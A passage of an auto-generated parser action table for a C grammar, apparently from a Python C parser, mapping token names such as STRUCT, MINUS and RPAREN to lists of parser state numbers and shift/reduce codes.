-228,-227,]),'LBRACKET':([2,3,5,6,7,10,11,12,13,18,20,22,23,26,27,30,33,34,35,36,39,42,43,44,46,48,49,50,54,56,58,60,62,68,71,73,76,77,80,81,82,86,96,97,98,100,101,103,104,105,106,109,111,127,132,133,134,136,138,139,140,141,142,143,145,147,148,152,153,154,156,160,161,163,164,166,167,168,169,176,177,187,191,198,199,200,211,216,227,230,235,236,237,238,240,241,261,263,269,275,276,278,279,280,283,310,312,314,316,317,328,340,341,342,344,345,347,355,356,371,376,402,403,404,405,407,411,414,442,443,448,449,453,454,457,458,464,465,470,472,474,482,483,488,489,490,492,511,512,518,519,520,526,527,529,530,531,532,544,545,547,550,551,559,560,563,565,570,571,572,],[-113,-128,-124,-110,-106,-104,-107,-125,-105,-99,-109,-120,-115,-102,-126,-108,-23
8,-111,-337,-122,-129,-29,-121,-116,-112,117,-123,-117,-119,-114,-130,-118,-103,-96,-98,128,-131,-37,-95,-101,-97,117,-147,-335,-146,-167,-166,-28,-180,-182,-27,-100,-126,128,-317,-321,-318,-303,-324,-330,-313,-319,-144,-301,-314,-142,-327,-325,-304,-322,-302,-315,-289,-328,-316,-329,-320,265,-323,-312,282,-149,-336,-183,-181,-30,282,-38,373,-326,-334,-332,-331,-333,-174,-175,-298,-297,-143,-140,282,282,-141,-145,421,-312,-127,-153,-151,-148,-168,-36,-35,282,282,459,-45,-44,-43,-199,373,-296,-295,-294,-293,-292,-305,421,-152,-150,-170,-169,-31,-34,282,459,-39,-42,-202,373,-200,-290,-291,373,-213,-207,-211,-33,-32,-41,-40,-201,549,-307,-209,-208,-210,-212,-51,-50,-306,373,-299,-46,-49,-308,-300,-48,-47,-309,]),'WCHAR_CONST':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,133,-335,-28,-182,-27,133,-337,-87,-72,-337,133,-286,-285,133,133,-283,-287,-288,133,-284,133,133,133,-336,-183,133,133,-28,-337,133,-28,-337,-337,133,133,133,133,133,133,133,133,133,133,133,133,133,133,133,133,133,133,133,133,133,133,133,133,-337,-76,-79,-82,-75,133,-77,133,133,-81,-215,-214,-80,-216,133,-78,133,133,-69,-284,133,133,-284,133,133,-244,-247,-245,-241,-242,-246,-248,133,-250,-251,-243,-249,-12,133,133,-11,133,133,133,133,-234,-233,133,-231,133,133,-217,133,-230,133,-84,-218,133,133,133,-337,-337,-198,133,133,133,-337,-284,-229,-232,133,-221,133,-83,-219,-68,133,-28,-337,133,-11,133,133,-220,133,133,133,-284,133,133,133,-337,133,-225,-224,-222,-84,133,133,133,-226,-223,133,-228,-227,]),'FLOAT_CONST':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,134,-335,-28,-182,-27,134,-337,-87,-72,-337,134,-286,-285,134,134,-283,-287,-288,134,-284,134,134,134,-336,-183,134,134,-28,-337,134,-28,-337,-337,134,134,134,134,134,134,134,134,134,134,134,134,134,134,134,134,134,134,134,134,134,134,134,134,-337,-76,-79,-82,-75,134,-77,134,134,-81,-215,-214,-80,-216,134,-78,134,134,-69,-284,134,134,-284,134,134,-244,-247,-245,-241,-242,-246,-248,134,-250,-251,-243,-249,-12,134,134,-11,134,134,134,134,-234,-233,134,-231,134,134,-217,134,-230,134,-84,-218,134,134,134,-337,-337,-198,134,134,134,-337,-284,-229,-232,134,-221,134,-83,-219,-68,134,-28,-337,134,-11,134,134,-220,134,134,134,-284,134,134,134,-337,134,-225,-224,-222,-84,134,134,134,-226,-223,134,-228,-227,]),'MINUS':([3,
39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,132,133,134,135,136,137,138,139,140,141,143,144,145,146,148,149,150,151,152,153,154,156,158,160,161,162,163,164,165,166,167,168,169,171,173,174,175,176,181,191,198,201,204,205,206,218,219,220,224,227,229,230,231,232,233,234,235,236,237,238,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,263,265,266,268,273,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,310,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,478,480,481,482,483,484,487,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,547,549,550,551,553,554,555,557,558,565,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,135,-335,-28,-182,-27,135,-337,-87,-72,-337,135,-317,-321,-318,-286,-303,-285,-324,-330,-313,-319,-301,-274,-314,135,-327,135,-283,-287,-325,-304,-322,-302,-255,-315,-289,245,-328,-316,-288,-329,-320,-276,-323,135,-284,135,135,-312,135,-336,-183,135,135,-28,-337,135,-28,-337,-274,-337,135,-326,135,-280,135,-277,-334,-332,-331,-333,135,135,135,135,135,135,135,135,135,135,135,135,135,135,135,135,135,135,135,-298,-297,135,135,-279,-278,-337,-76,-79,-82,-75,135,-77,135,135,-81,-215,-214,-80,-216,135,-78,-312,135,135,-69,-284,135,135,-284,135,135,-244,-247,-245,-241,-242,-246,-248,135,-250,-251,-243,-249,-12,135,135,-11,245,245,245,-260,245,245,245,-259,245,245,-257,-256,245,245,245,245,245,-258,-296,-295,-294,-293,-292,-305,135,135,135,135,-234,-233,135,-231,135,135,-217,135,-230,135,-84,-218,135,135,135,-337,-337,-198,135,-281,-282,135,-290,-291,135,-275,-337,-284,-229,-232,135,-221,135,-83,-219,-68,135,-28,-337,135,-11,135,135,-220,135,135,135,-284,135,135,-306,135,-337,-299,135,-225,-224,-222,-84,-300,135,135,135,-226,-223,135,-228,-227,]),'RPAREN':([2,3,5,6,7,10,11,12,13,18,20,22,23,26,27,30,33,34,35,36,39,42,43,44,46,48,49,50,54,56,58,60,62,68,71,73,76,77,80,81,82,86,96,98,100,101,103,104,105,106,107,109,111,118,125,127,129,132,133,134,136,138,139,140,141,142,143,144,145,147,148,152,153,154,156,157,158,159,160,161,162,163,164,166,167,168,169,176,177,178,183,187,191,198,199,200,203,207,208,209,210,211,212,213,215,216,221,222,224,225,230,232,234,235,236,237,238,240,241,261,263,266,268,269,270,271,272,273,274,275,276,277,278,279,280,281,283,294,312,314,316,317,328,340,341,342,343,344,345,346,347,348,355,356,378,379,380,381,382,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,408,409,411,414,415,416,417,418,422,433,439,442,443,448,449,452,453,454,457,458,460,461,462,463,464,465,468,476,478,480,482,483,486,487,489,490,492,495,501,503,507,511,512,516,517,518,519,524,525,526,527,529,530,531,532,544,545,547,551,553,556,559,560,563,565,566,567,570,571,572,573,],[-113,-128,-124,-110,-106,-104,-107,-125,-105,-99,-109,-120,-115,-102,-126,-108,-238,-111,-337,-122,-129,-29,-121,-116,-112,-52,-123,-117,-119,-114,-130,-118,-103,-96,-98,-54,-131,-37,-95,-101,-97,-53,-147,-146,-167,-166,-28,-180,-182,-27,200,-100,-126,-337,216,-55,-337,-317,-321,-318,-303,-324,-330,-313,-319,-144,-301,-274,-314,-142,-327,-325,-304,-322,-302,240,-255,241,-315,-289,-253,-328,-316,-329,-320,-276,-323,-312,-337,-252,312,-149,-336,-183,-181,-30,332,340,-17,341,-186,-337,-18,-184,-191,-38,355,356,-274,-239,-326,-280,-277,-334,-332,-3
31,-333,-174,-175,-298,-297,407,-279,-143,411,413,-235,-278,-203,-140,-204,-1,-337,-141,-145,-2,-206,-14,-127,-153,-151,-148,-168,-36,-35,-337,-190,-204,-56,-188,-45,-189,-44,-43,476,477,478,479,480,-261,-273,-262,-260,-264,-268,-263,-259,-266,-271,-257,-256,-265,-272,-267,-269,-270,-258,-296,-295,-294,-293,-292,-310,483,-305,-205,-23,-24,489,490,-337,-13,-218,-152,-150,-170,-169,510,-31,-34,-204,-57,-337,-192,-185,-187,-39,-42,-240,-237,-281,-282,-290,-291,-236,-275,-213,-207,-211,532,535,537,539,-33,-32,544,545,-41,-40,-254,-311,547,-307,-209,-208,-210,-212,-51,-50,-306,-299,-337,568,-46,-49,-308,-300,-337,574,-48,-47,-309,577,]),'STRUCT':([0,1,3,7,10,11,13,14,16,17,19,20,21,25,26,27,29,30,38,39,40,42,45,47,48,52,53,55,58,59,61,62,63,64,65,66,67,75,85,86,87,90,91,93,94,95,97,99,105,118,119,120,121,122,123,124,129,172,174,180,181,182,184,185,186,188,189,190,191,198,200,214,223,229,231,233,239,240,241,267,278,284,285,286,289,291,298,300,301,302,303,305,308,312,313,315,318,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,446,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[24,-337,-128,-106,-104,-107,-105,-64,-60,-67,-66,-109,24,-65,-102,-337,-131,-108,-63,-129,24,-29,-62,-70,-52,-337,-337,-337,-130,24,-71,-103,-337,-9,-131,-91,-10,24,24,-53,-337,-88,24,24,-93,24,-335,24,-182,24,-87,-90,-94,-92,-61,-72,24,24,24,-73,24,-89,24,24,24,-159,-160,-156,-336,-183,-30,24,-74,24,24,24,24,-174,-175,24,24,-76,-79,-82,-75,-77,24,-81,-215,-214,-80,-216,-78,-127,24,24,-157,-69,-36,-35,24,24,24,-234,-233,24,-231,-217,-230,-81,-84,-218,-158,-31,-34,24,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'LONG':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,40,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,71,75,76,80,81,82,85,86,87,89,90,91,93,94,95,96,97,98,99,100,101,105,109,111,118,119,120,121,122,123,124,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,211,214,223,229,231,233,239,240,241,267,269,275,278,279,280,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[23,-337,-113,-128,23,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,23,-120,-115,-65,-102,-126,-131,-108,-238,-111,-122,-63,-129,23,-29,-121,-116,-62,-112,-70,-52,-123,-117,-337,-337,-119,-337,-114,-130,23,-118,-71,-103,-337,-9,-131,-91,-10,-96,-98,23,-131,-95,-101,-97,23,-53,-126,23,-88,23,23,-93,23,-147,-335,-146,23,-167,-166,-182,-100,-126,23,-87,-90,-94,-92,-61,-72,23,-144,-142,23,23,23,-73,23,-89,23,23,23,-149,-159,-160,-156,-336,23,-183,-30,23,23,-74,23,23,23,23,-174,-175,23,-143,-140,23,-141,-145,-76,-79,-82,-75,-77,23,-81,-215,-214,-80,-216,-78,-127,23,-153,23,-151,-148,-157,-168,-69,-36,-35,23,23,23,-234,-233,23,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,23,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'PLUS':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,132,133,134,135,136,137,138,139,140,141,143,144,145,146,148,149,150,151,152,153,154,156,158,160,161,162,163,164,165,166,167,168,169,171,173,174,175,176,181,191,198,201,204,205,206,218,219,220,224,227,229,230,231,232,233,234,235,236,237,238,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,261,263,265,266,268,273,282,284,285,2
86,289,290,291,297,298,300,301,302,303,305,307,308,310,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,478,480,481,482,483,484,487,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,547,549,550,551,553,554,555,557,558,565,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,137,-335,-28,-182,-27,137,-337,-87,-72,-337,137,-317,-321,-318,-286,-303,-285,-324,-330,-313,-319,-301,-274,-314,137,-327,137,-283,-287,-325,-304,-322,-302,-255,-315,-289,249,-328,-316,-288,-329,-320,-276,-323,137,-284,137,137,-312,137,-336,-183,137,137,-28,-337,137,-28,-337,-274,-337,137,-326,137,-280,137,-277,-334,-332,-331,-333,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,137,-298,-297,137,137,-279,-278,-337,-76,-79,-82,-75,137,-77,137,137,-81,-215,-214,-80,-216,137,-78,-312,137,137,-69,-284,137,137,-284,137,137,-244,-247,-245,-241,-242,-246,-248,137,-250,-251,-243,-249,-12,137,137,-11,249,249,249,-260,249,249,249,-259,249,249,-257,-256,249,249,249,249,249,-258,-296,-295,-294,-293,-292,-305,137,137,137,137,-234,-233,137,-231,137,137,-217,137,-230,137,-84,-218,137,137,137,-337,-337,-198,137,-281,-282,137,-290,-291,137,-275,-337,-284,-229,-232,137,-221,137,-83,-219,-68,137,-28,-337,137,-11,137,137,-220,137,137,137,-284,137,137,-306,137,-337,-299,137,-225,-224,-222,-84,-300,137,137,137,-226,-223,137,-228,-227,]),'ELLIPSIS':([350,],[462,]),'U32STRING_LITERAL':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,139,146,148,149,150,151,153,163,165,166,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,235,236,237,238,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,139,-335,-28,-182,-27,139,-337,-87,-72,-337,139,-286,-285,-330,139,-327,139,-283,-287,235,-328,-288,-329,139,-284,139,139,139,-336,-183,139,139,-28,-337,139,-28,-337,-337,139,139,139,-334,-332,-331,-333,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,139,-337,-76,-79,-82,-75,139,-77,139,139,-81,-215,-214,-80,-216,139,-78,139,139,-69,-284,139,139,-284,139,139,-244,-247,-245,-241,-242,-246,-248,139,-250,-251,-243,-249,-12,139,139,-11,139,139,139,139,-234,-233,139,-231,139,139,-217,139,-230,139,-84,-218,139,139,139,-337,-337,-198,139,139,139,-337,-284,-229,-232,139,-221,139,-83,-219,-68,139,-28,-337,139,-11,139,139,-220,139,139,139,-284,139,139,139,-337,139,-225,-224,-222,-84,139,139,139,-226,-223,139,-228,-227,]),'GT':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,250,-328,-31
6,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-261,250,-262,-260,-264,250,-263,-259,-266,250,-257,-256,-265,250,250,250,250,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'GOTO':([61,97,119,124,181,191,284,285,286,289,291,298,300,301,302,303,305,307,308,332,424,425,428,429,432,435,437,438,439,440,496,497,500,502,505,506,510,535,536,537,539,554,555,557,558,569,574,575,576,577,578,579,],[-71,-335,-87,-72,287,-336,-76,-79,-82,-75,-77,287,-81,-215,-214,-80,-216,287,-78,-69,-234,-233,-231,287,-217,-230,287,-84,-218,287,-229,-232,-221,287,-83,-219,-68,287,-220,287,287,-225,-224,-222,-84,287,287,-226,-223,287,-228,-227,]),'ENUM':([0,1,3,7,10,11,13,14,16,17,19,20,21,25,26,27,29,30,38,39,40,42,45,47,48,52,53,55,58,59,61,62,63,64,65,66,67,75,85,86,87,90,91,93,94,95,97,99,105,118,119,120,121,122,123,124,129,172,174,180,181,182,184,185,186,188,189,190,191,198,200,214,223,229,231,233,239,240,241,267,278,284,285,286,289,291,298,300,301,302,303,305,308,312,313,315,318,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,446,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[32,-337,-128,-106,-104,-107,-105,-64,-60,-67,-66,-109,32,-65,-102,-337,-131,-108,-63,-129,32,-29,-62,-70,-52,-337,-337,-337,-130,32,-71,-103,-337,-9,-131,-91,-10,32,32,-53,-337,-88,32,32,-93,32,-335,32,-182,32,-87,-90,-94,-92,-61,-72,32,32,32,-73,32,-89,32,32,32,-159,-160,-156,-336,-183,-30,32,-74,32,32,32,32,-174,-175,32,32,-76,-79,-82,-75,-77,32,-81,-215,-214,-80,-216,-78,-127,32,32,-157,-69,-36,-35,32,32,32,-234,-233,32,-231,-217,-230,-81,-84,-218,-158,-31,-34,32,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'PERIOD':([97,132,133,134,136,138,139,140,141,143,145,148,152,153,154,156,160,161,163,164,166,167,168,169,176,191,227,230,235,236,237,238,261,263,310,371,376,402,403,404,405,407,411,470,472,474,482,483,488,520,526,527,547,550,551,563,565,572,],[-335,-317,-321,-318,-303,-324,-330,-313,-319,-301,-314,-327,-325,-304,-322,-302,-315,-289,-328,-316,-329,-320,264,-323,-312,-336,372,-326,-334,-332,-331,-333,-298,-297,-312,-199,372,-296,-295,-294,-293,-292,-305,-202,372,-200,-290,-291,372,-201,548,-307,-306,372,-299,-308,-300,-309,]),'GE':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,158,160,161,162,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,383,384,385,386,387,388,389,390,391,392,393,394,395,396,397,398,400,401,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-255,-315,-289,254,-328,-316,-329,-320,-276,-323,-312,-336,-274,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-261,254,-262,-260,-264,254,-263,-259,-266,254,-257,-256,-265,254,254,254,254,-258,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'INT_CONST_DEC':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,5
42,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,140,-335,-28,-182,-27,140,-337,-87,-72,-337,140,-286,-285,140,140,-283,-287,-288,140,-284,140,140,140,-336,-183,140,140,-28,-337,140,-28,-337,-337,140,140,140,140,140,140,140,140,140,140,140,140,140,140,140,140,140,140,140,140,140,140,140,140,-337,-76,-79,-82,-75,140,-77,140,140,-81,-215,-214,-80,-216,140,-78,140,140,-69,-284,140,140,-284,140,140,-244,-247,-245,-241,-242,-246,-248,140,-250,-251,-243,-249,-12,140,140,-11,140,140,140,140,-234,-233,140,-231,140,140,-217,140,-230,140,-84,-218,140,140,140,-337,-337,-198,140,140,140,-337,-284,-229,-232,140,-221,140,-83,-219,-68,140,-28,-337,140,-11,140,140,-220,140,140,140,-284,140,140,140,-337,140,-225,-224,-222,-84,140,140,140,-226,-223,140,-228,-227,]),'ARROW':([132,133,134,136,138,139,140,141,143,145,148,152,153,154,156,160,161,163,164,166,167,168,169,176,191,230,235,236,237,238,261,263,310,402,403,404,405,407,411,482,483,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-314,-327,-325,-304,-322,-302,-315,-289,-328,-316,-329,-320,262,-323,-312,-336,-326,-334,-332,-331,-333,-298,-297,-312,-296,-295,-294,-293,-292,-305,-290,-291,-306,-299,-300,]),'_STATIC_ASSERT':([0,14,16,17,19,25,38,45,47,59,61,97,119,123,124,180,181,191,223,284,285,286,289,291,298,300,301,302,303,305,307,308,332,424,425,428,429,432,435,437,438,439,440,496,497,500,502,505,506,510,535,536,537,539,554,555,557,558,569,574,575,576,577,578,579,],[41,-64,-60,-67,-66,-65,-63,-62,-70,41,-71,-335,-87,-61,-72,-73,41,-336,-74,-76,-79,-82,-75,-77,41,-81,-215,-214,-80,-216,41,-78,-69,-234,-233,-231,41,-217,-230,41,-84,-218,41,-229,-232,-221,41,-83,-219,-68,41,-220,41,41,-225,-224,-222,-84,41,41,-226,-223,41,-228,-227,]),'CHAR':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,40,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,71,75,76,80,81,82,85,86,87,89,90,91,93,94,95,96,97,98,99,100,101,105,109,111,118,119,120,121,122,123,124,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,211,214,223,229,231,233,239,240,241,267,269,275,278,279,280,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[46,-337,-113,-128,46,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,46,-120,-115,-65,-102,-126,-131,-108,-238,-111,-122,-63,-129,46,-29,-121,-116,-62,-112,-70,-52,-123,-117,-337,-337,-119,-337,-114,-130,46,-118,-71,-103,-337,-9,-131,-91,-10,-96,-98,46,-131,-95,-101,-97,46,-53,-126,46,-88,46,46,-93,46,-147,-335,-146,46,-167,-166,-182,-100,-126,46,-87,-90,-94,-92,-61,-72,46,-144,-142,46,46,46,-73,46,-89,46,46,46,-149,-159,-160,-156,-336,46,-183,-30,46,46,-74,46,46,46,46,-174,-175,46,-143,-140,46,-141,-145,-76,-79,-82,-75,-77,46,-81,-215,-214,-80,-216,-78,-127,46,-153,46,-151,-148,-157,-168,-69,-36,-35,46,46,46,-234,-233,46,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,46,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'HEX_FLOAT_CONST':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,
353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,500,502,505,506,510,513,514,515,521,522,533,535,536,537,538,539,541,542,543,549,550,553,554,555,557,558,566,569,574,575,576,577,578,579,],[-128,-129,-130,-71,-131,141,-335,-28,-182,-27,141,-337,-87,-72,-337,141,-286,-285,141,141,-283,-287,-288,141,-284,141,141,141,-336,-183,141,141,-28,-337,141,-28,-337,-337,141,141,141,141,141,141,141,141,141,141,141,141,141,141,141,141,141,141,141,141,141,141,141,141,-337,-76,-79,-82,-75,141,-77,141,141,-81,-215,-214,-80,-216,141,-78,141,141,-69,-284,141,141,-284,141,141,-244,-247,-245,-241,-242,-246,-248,141,-250,-251,-243,-249,-12,141,141,-11,141,141,141,141,-234,-233,141,-231,141,141,-217,141,-230,141,-84,-218,141,141,141,-337,-337,-198,141,141,141,-337,-284,-229,-232,141,-221,141,-83,-219,-68,141,-28,-337,141,-11,141,141,-220,141,141,141,-284,141,141,141,-337,141,-225,-224,-222,-84,141,141,141,-226,-223,141,-228,-227,]),'DOUBLE':([0,1,2,3,4,5,6,7,10,11,12,13,14,16,17,18,19,20,21,22,23,25,26,27,29,30,33,34,36,38,39,40,42,43,44,45,46,47,48,49,50,52,53,54,55,56,58,59,60,61,62,63,64,65,66,67,68,71,75,76,80,81,82,85,86,87,89,90,91,93,94,95,96,97,98,99,100,101,105,109,111,118,119,120,121,122,123,124,129,142,147,172,174,177,180,181,182,184,185,186,187,188,189,190,191,192,198,200,211,214,223,229,231,233,239,240,241,267,269,275,278,279,280,284,285,286,289,291,298,300,301,302,303,305,308,312,313,314,315,316,317,318,328,332,340,341,342,350,422,424,425,427,428,432,435,437,438,439,442,443,446,448,449,453,454,460,496,497,500,505,506,510,511,512,536,554,555,557,558,575,576,578,579,],[50,-337,-113,-128,50,-124,-110,-106,-104,-107,-125,-105,-64,-60,-67,-99,-66,-109,50,-120,-115,-65,-102,-126,-131,-108,-238,-111,-122,-63,-129,50,-29,-121,-116,-62,-112,-70,-52,-123,-117,-337,-337,-119,-337,-114,-130,50,-118,-71,-103,-337,-9,-131,-91,-10,-96,-98,50,-131,-95,-101,-97,50,-53,-126,50,-88,50,50,-93,50,-147,-335,-146,50,-167,-166,-182,-100,-126,50,-87,-90,-94,-92,-61,-72,50,-144,-142,50,50,50,-73,50,-89,50,50,50,-149,-159,-160,-156,-336,50,-183,-30,50,50,-74,50,50,50,50,-174,-175,50,-143,-140,50,-141,-145,-76,-79,-82,-75,-77,50,-81,-215,-214,-80,-216,-78,-127,50,-153,50,-151,-148,-157,-168,-69,-36,-35,50,50,50,-234,-233,50,-231,-217,-230,-81,-84,-218,-152,-150,-158,-170,-169,-31,-34,50,-229,-232,-221,-83,-219,-68,-33,-32,-220,-225,-224,-222,-84,-226,-223,-228,-227,]),'MINUSEQUAL':([132,133,134,136,138,139,140,141,143,144,145,148,152,153,154,156,160,161,163,164,166,167,168,169,176,191,224,230,232,234,235,236,237,238,261,263,268,273,310,402,403,404,405,407,411,478,480,482,483,487,547,551,565,],[-317,-321,-318,-303,-324,-330,-313,-319,-301,-274,-314,-327,-325,-304,-322,-302,-315,-289,-328,-316,-329,-320,-276,-323,-312,-336,358,-326,-280,-277,-334,-332,-331,-333,-298,-297,-279,-278,-312,-296,-295,-294,-293,-292,-305,-281,-282,-290,-291,-275,-306,-299,-300,]),'INT_CONST_OCT':([3,39,58,61,76,85,97,103,105,106,116,117,119,124,128,131,135,137,146,149,150,151,165,171,173,174,175,181,191,198,201,204,205,206,218,219,220,227,229,231,233,242,243,244,245,246,247,248,249,250,251,252,253,254,255,256,257,258,259,260,265,266,282,284,285,286,289,290,291,297,298,300,301,302,303,305,307,308,319,329,332,336,338,339,352,353,354,357,358,359,360,361,362,363,364,365,366,367,368,369,373,375,377,412,413,419,421,424,425,427,428,429,430,432,434,435,437,438,439,440,441,447,459,472,475,477,481,484,488,494,496,497,499,5
